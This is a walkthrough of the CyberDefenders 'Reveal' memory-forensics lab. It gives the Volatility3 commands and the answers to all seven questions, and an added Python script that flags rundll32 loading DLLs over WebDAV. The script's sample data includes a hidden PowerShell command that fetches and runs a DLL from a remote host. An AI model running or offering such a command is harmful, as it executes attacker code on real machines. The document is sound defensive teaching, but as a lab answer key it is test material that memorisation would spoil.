# Reveal Lab Incident Response Scenario

Incident Response Scenario:

You're a digital forensic analyst working for a top-tier financial institution. Your organization's SIEM system has alerted you to suspicious behavior originating from an internal workstation that has privileged access to confidential financial information. This activity could signal a potential cyber intrusion.

A **memory dump** from the affected machine has been secured for analysis. Your mission is to investigate this dump for **indicators of compromise (IoCs)**, determine how the anomaly started, contain the threat, and evaluate the extent of the incident.

> 💡 **Tip:** Don’t forget to use hints when stuck; they can guide your investigation!

***

#### 🛠 Tools Required:

* **Volatility3**

**📥 Installing Volatility3:**

```bash
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3
pip3 install -r requirements.txt
```

***

### 🔍 Forensic Analysis Tasks

***

#### **Q1) Identify the malicious process**

**Question:** Spotting the rogue process is the first step in understanding the attack. What is the name of the suspicious process?

**Solution:**\
Use the `windows.pslist` plugin to get an overview of running processes:

```bash
python3 vol.py -f /home/kali/Downloads/192-Reveal.dmp windows.pslist
```

Among the entries, you might notice an unusual instance of **`powershell.exe`**, which is out of place in this context. That’s your malicious process.

**Answer:**\
`powershell.exe`

***

#### **Q2) Find the parent PID**

**Question:** Discovering the PPID (Parent Process ID) helps map out the process hierarchy and understand how the threat was initiated. What is the PPID of the malicious `powershell.exe` process? The PPID column of the `windows.pslist` output from Q1 gives it.

**Answer:**\
`4120`

***

#### **Q3) Identify the second-stage payload filename**

**Question:** Knowing what executable was used to deploy the second payload helps pinpoint the next phase of the attack.

> 🔎 Hint: Try using the `windows.cmdline` plugin.

```bash
python3 vol.py -f /home/kali/Downloads/192-Reveal.dmp windows.cmdline
```

Look for the command-line arguments tied to `powershell.exe`. You’ll spot a DLL being loaded:

**Answer:**\
`3435.dll`

***

#### **Q4) What is the remote shared directory accessed?**

**Question:** Tracing which shared resource the attacker accessed remotely can reveal exfiltration points or staging areas. The path in the `windows.cmdline` output that loads the DLL points at a remote WebDAV share; the share name in that path is the answer.

**Answer:**\
`davwwwroot`

***

#### **Q5) What MITRE technique was used?**

**Question:** Based on the process command line (hint: it includes `rundll32`), what technique ID does this correspond to in the MITRE ATT&CK framework?

> `rundll32` is commonly abused to bypass security mechanisms.

**Answer:**\
`T1218.011`
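As an added example (not part of the lab writeup or of Volatility3 itself), the following Python script automates the triage done by hand in Q1 to Q5: it parses constructed, tab-separated samples of `windows.pslist` and `windows.cmdline` output, flags any command line where `rundll32` loads a DLL from a UNC path (the T1218.011 pattern seen in this lab), and walks the PPID chain for each hit. All PIDs, the IP address and the exact command line are constructed; only the tool names and the `davwwwroot`/`3435.dll` strings come from the writeup.

```python
import re

# Constructed sample of `windows.pslist` output (only the columns used here).
# PIDs and names are made up, not taken from the lab dump. explorer.exe's
# parent (3980) is deliberately absent, as an exited parent would be.
PSLIST_SAMPLE = """\
Volatility 3 Framework (constructed banner line)
PID\tPPID\tImageFileName
4\t0\tSystem
4120\t3980\texplorer.exe
5204\t4120\tpowershell.exe
"""

# Constructed sample of `windows.cmdline` output; the UNC path is made up but
# follows the shape the lab describes (rundll32 loading a DLL over WebDAV).
CMDLINE_SAMPLE = """\
PID\tProcess\tArgs
4120\texplorer.exe\tC:\\Windows\\Explorer.EXE
5204\tpowershell.exe\tpowershell.exe -w hidden rundll32 \\\\203.0.113.10@8888\\davwwwroot\\3435.dll,entry
"""

# rundll32 followed by a UNC DLL path: \\host[@port]\share\...\name.dll
REMOTE_RUNDLL32 = re.compile(r"rundll32(?:\.exe)?\s+(\\\\[^\s,]+\.dll)", re.IGNORECASE)


def parse_table(text):
    """Parse Volatility3 tab-separated text output into dict rows, skipping banner lines."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    start = next(i for i, ln in enumerate(lines) if ln.startswith("PID"))
    header = lines[start].split("\t")
    return [dict(zip(header, ln.split("\t"))) for ln in lines[start + 1:]]


def flag_remote_rundll32(cmdline_text):
    """Return (pid, dll_path) for each command line loading a DLL via rundll32 from a UNC path."""
    hits = []
    for row in parse_table(cmdline_text):
        m = REMOTE_RUNDLL32.search(row["Args"])
        if m:
            hits.append((int(row["PID"]), m.group(1)))
    return hits


def ancestry(pslist_text, pid):
    """Walk PPID links from pid upwards; returns image names, child first, stopping at a missing parent."""
    rows = {int(r["PID"]): r for r in parse_table(pslist_text)}
    chain, seen = [], set()
    while pid in rows and pid not in seen:
        seen.add(pid)
        chain.append(rows[pid]["ImageFileName"])
        pid = int(rows[pid]["PPID"])
    return chain


if __name__ == "__main__":
    for pid, dll in flag_remote_rundll32(CMDLINE_SAMPLE):
        print(f"PID {pid} loads {dll}; ancestry: {' <- '.join(ancestry(PSLIST_SAMPLE, pid))}")
```

On real output, pipe `vol.py ... windows.cmdline` and `windows.pslist` into files and pass their contents to the two functions; a hit plus a `davwwwroot` share in the path is the combination this lab's Q3 to Q5 turn on.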

***

#### **Q6) What is the compromised user account?**

**Question:** Determining which user account executed the malicious process helps assess which credentials and permissions were abused.

> Use the `windows.sessions` plugin.

```bash
python3 vol.py -f /home/kali/Downloads/192-Reveal.dmp windows.sessions
```

**Answer:**\
`Elon`

***

#### **Q7) Identify the malware family**

**Question:** Investigate the suspicious IP address or other artifacts you found on VirusTotal. What is the name of the malware family associated with them?

Head to the **Graph Summary** in VirusTotal and expand related nodes.

**Answer:**\
`StrelaStealer`

***

#### 🔗 Lab Source:

[**CyberDefenders – Reveal**](https://cyberdefenders.org/blueteam-ctf-challenges/reveal/)
